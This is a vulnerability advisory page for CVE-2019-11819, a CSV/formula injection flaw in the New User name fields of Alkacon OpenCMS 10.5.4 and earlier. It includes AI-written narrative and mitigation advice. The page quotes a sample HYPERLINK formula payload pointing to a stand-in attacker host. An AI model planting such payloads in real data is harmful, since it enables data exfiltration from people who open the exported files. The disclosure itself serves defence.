VYPR
High severityNVD Advisory· Published May 8, 2019· Updated Aug 4, 2024

CVE-2019-11819

CVE-2019-11819

Description

Alkacon OpenCMS v10.5.4 and before is affected by CSV (aka Excel Macro) Injection in the module New User (/opencms/system/workplace/admin/accounts/user_new.jsp) via the First Name or Last Name.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Alkacon OpenCMS 10.5.4 and earlier is vulnerable to CSV injection via the First Name and Last Name fields in the New User module, enabling formula injection when exported CSV is opened.

Vulnerability

Overview

CVE-2019-11819 describes a CSV injection vulnerability in Alkacon OpenCMS versions 10.5.4 and earlier. The flaw resides in the New User module, specifically in the parameters for First Name and Last Name within the /opencms/system/workplace/admin/accounts/user_new.jsp page [3][4]. The application fails to sanitize user-supplied input before including it in exported CSV files, allowing an attacker to inject spreadsheet formulas.

Exploitation

Details

To exploit this vulnerability, an attacker must have access to create or modify user accounts (i.e., at minimum a user with privileges to add new users). By entering a payload such as =HYPERLINK("http://attacker-ip/path","IAmSafe") into the First Name or Last Name field, the malicious formula is stored. When an administrator or another user exports the user list using the Export User feature, the payload becomes embedded in the resulting CSV file [3][4]. The attack is triggered when the CSV file is opened in a spreadsheet application like Microsoft Excel or LibreOffice Calc, which interprets cells starting with = as formulas.

Impact

Successful exploitation can lead to several outcomes depending on the spreadsheet software and user behavior. Attackers may leverage known vulnerabilities in the spreadsheet engine (e.g., CVE-2014-3524) or rely on social engineering to bypass security warnings. Potential impacts include arbitrary code execution on the user's machine, exfiltration of data from the CSV file or other open spreadsheets, and further compromise of the user's system [4].

Mitigation

A fix for this issue is available in OpenCMS versions after 10.5.4. Users are advised to upgrade to the latest version. For those unable to upgrade, ensure that exported CSV files are opened only in a safe viewing mode or after sanitizing formula-related characters. The vulnerability has been publicly disclosed and a proof-of-concept exists, so patching is strongly recommended [2][3][4].

AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
org.opencms:opencms-coreMaven
< 11.0.011.0.0

Affected products

2

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

4

News mentions

0

No linked articles in our index yet.